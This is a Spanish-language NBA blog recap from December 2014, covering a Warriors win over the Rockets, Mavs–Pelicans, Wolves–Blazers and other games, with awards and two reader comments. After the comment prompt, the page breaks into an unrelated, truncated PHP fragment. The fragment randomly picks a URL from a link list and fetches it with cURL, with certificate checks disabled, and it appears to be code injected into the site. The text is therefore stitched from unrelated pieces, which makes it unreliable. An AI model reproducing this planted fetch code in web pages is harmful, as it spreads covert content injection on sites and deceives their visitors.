La crónica: Los Warriors son de oro

11 de December de 2014 por MagicJohnson32

Los Warriors siguen a lo suyo, han colocado a su entrenador en los libros de historia, y miran por el retrovisor al resto de la liga. Le siguen el paso últimamente los Clippers, que, como decía aquella niña tan inquietante de la película, “ya están aquíiiii”. Tropezón imperdonable de los Blazers y valiosa victoria de los Mavs ante la sociedad Davis & Holiday. Además, la noche nos dejó un buzzer beater ganador de Bradley Beal, un triple doble perdedor de Rondo, y la décima derrota seguida de los Knicks, esta vez sin Melo y ante unos Spurs de summer league.

Os lo contamos todo a continuación.

warr

ROCKETS 93 – WARRIORS 105

No hay quien pare a los Warriors, ganadores de 14 partidos consecutivos y mejor equipo de la liga cuando ya llevamos mes y medio de competición. Anoche tuvieron que sudar ante los competitivos Rockets, que todavía no han recuperado a Howard pero que se bastan con James Harden y poco más para poner en apuros a cualquiera. Los del Estado Dorado, con Bogut ausente por una lesión leve, necesitaron unos últimos 5 minutos demoledores para despachar a los texanos y otorgar a Steve Kerr el mejor inicio para un técnico debutante con 19 victorias en 21 partidos. Frente al monólogo de Harden, los Warriors contaron con buenas actuaciones de Curry, Thompson, Barnes y Green, además de la ya habitual contribución en plan microondas de Speights desde el banco. Los Rockets siguen en la pomada, mientras los Warriors se despegan con dos partidos de margen sobre el segundo.

PELICANS 107 – MAVS 112

Monty Williams y los Pelicans tienen un problema serio si, en las últimas 14 posesiones de un partido igualado, el balón pasa por las manos de Anthony Davis en cuatro de ellas. Ocurrió anoche en Dallas, pese a lo cual Ryan Anderson tuvo el triple para forzar la prórroga. El lanzamiento del stretch four no entró y Carlisle pudo respirar tranquilo con una valiosa victoria que mantiene a los Mavs en ese selectísimo grupo de siete equipos del Oeste con un balance por encima del 70% de triunfos. Dallas contó con cuatro jugadores (Dirk, Parsons, Ellis y Harris) por encima de la veintena de puntos, mientras que, por los Pelicans, al de siempre (Davis) se le unió en esta ocasión un excelente Holiday.

BLAZERS 82 – WOLVES 90

La sorpresa de la noche llegó desde Minnesota, donde uno de los mejores equipos durante las últimas semanas cedió frente al colista del Oeste. Mucha culpa de ello recae sobre el número 1 del pasado draft. Con los Blazers cerca de remontar una desventaja de 20 puntos y cuando más temblaban las muñecas de los locales, Andrew Wiggins redondeó con 5 puntos seguidos su mejor actuación desde que es profesional y dio a los sufridos aficionados de los Wolves motivos para la esperanza. Pese a sus problemas en los tiros libres, Wiggins fue el mejor de un partido en el que naufragó LaMarcus Aldridge, nefasto desde el salto inicial. La noche negra de su estrella costó una dolorosa derrota a los Blazers, que pese a todo se mantienen en la tercera posición del Oeste.

EL RESTO DE LA JORNADA

Destacan dos rachas antagónicas: por un lado, la novena victoria de los Clippers en un partido que se complicó al final frente los Pacers; por el otro, la décima derrota consecutiva de los Knicks. Chris Paul y compañía tuvieron que aplicarse al máximo en el último cuarto para evitar que los locales les remontaran un partido que hasta mediados del tercer cuarto había sido muy plácido. En cambio, los de la Gran Manzana saltaron a la cancha sin Carmelo ni JR Smith y fueron arrollados sin problemas por unos Spurs en los que descansaron Parker, Ginobili y Duncan. Tampoco podemos obviar los 8 partidos consecutivas que llevan ganando los Atlanta Hawks. Ayer el rival eran los Sixers pero eso no tiene que quitarles ningún mérito. Los Hawks ya están muy cerca de los líderes de la conferencia y justo detrás llegan los Wizards, que anoche vencieron en Orlando con una bandeja sobre la bocina de Bradley Beal a pase de Andre Miller cuando solo quedaban 0.8s en el marcador. Sin duda, la jugada de la noche.

Chicago se dio en festín con unos Nets desquiciados y envueltos en rumores y los Nuggets se impusieron más cómodamente de lo previsto a los Heat. Las buenas sensaciones que dejaron los de Florida a principio de temporada se van evaporando partido a partido. Los Hornets ganaron a los Celtics (en los que Rondo formó otro triple doble) de la mano de un gran Al Jefferson y a pesar de lo poco que se parecen a los de la temporada pasada y de haber ganado solo 6 de sus 21 partidos, se encuentran a 2 victorias y media de los puestos de PO. Cosas del Este.

PREMIOS

MVP: Primera vez que encontramos por aquí a Al Jefferson, y es que ni los Hornets están ganando muchos partidos ni él está en su mejor momento. Ayer Big Al recuperó su mejor versión con 23 puntos y 14 rebotes y los Hornets encadenan 2 victorias consecutivas.

Rookie: Partidazo con mayúsculas de Andrew Wiggins. No solo por sus 23 puntos, 10 rebotes y 4 asistencias sino por su actitud y su acierto en los momentos cruciales del partido. Gracias a él, los Wolves se hicierom con la victoria.

Sorpresa: ¿No están Parker, Ginobili o Duncan? No pasa nada. En los Spurs puede aparecer un Marco Belinelli y anotar 22 puntos.

Decepción: Partido tonto de LaMarcus Aldridge, que se quedó en unos anonadinos 10 puntos y 9 rebotes. El problema es que además perdió 5 balones y necesitó 14 tiros para conseguir esa pobre cifra anotadora.

Esfuerzo en vano: Imposible decidir entre James Harden y la pareja Anthony Davis – Jrue Holiday. El de los Rockets jugó a pesar de las molestias y anotó 34 puntos (que completó con 8 rebotes, 4 asistencias y 4 robos) y la pareja de los Pelicans se fue a los 61 puntos.

Top 10

Comenta

2 comentarios a esta entrada

  1. Schize dice:
    #1

    Hay un error, un cambiazo Hornets x Pelicans.
    Por lo demás, genial la crónica, como siempre.
    PD: Me alegro de que Wiggins haya jugado tan bien. A ver si los rookies empiezan a espabilar.

      Citar

  2. MagicJohnson32 dice:
    #2

    Schize:
    Hay un error, un cambiazo Hornets x Pelicans.
    Por lo demás, genial la crónica, como siempre.
    PD: Me alegro de que Wiggins haya jugado tan bien. A ver si los rookies empiezan a espabilar.

    Jajaja… ya lo anticipaba en las últimas reflexiones sobre la bocina, que lo de Hornets-Pelicans-Bobcats iba a ser un lío hasta que nos acostumbremos.

    En fin ¡gracias!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>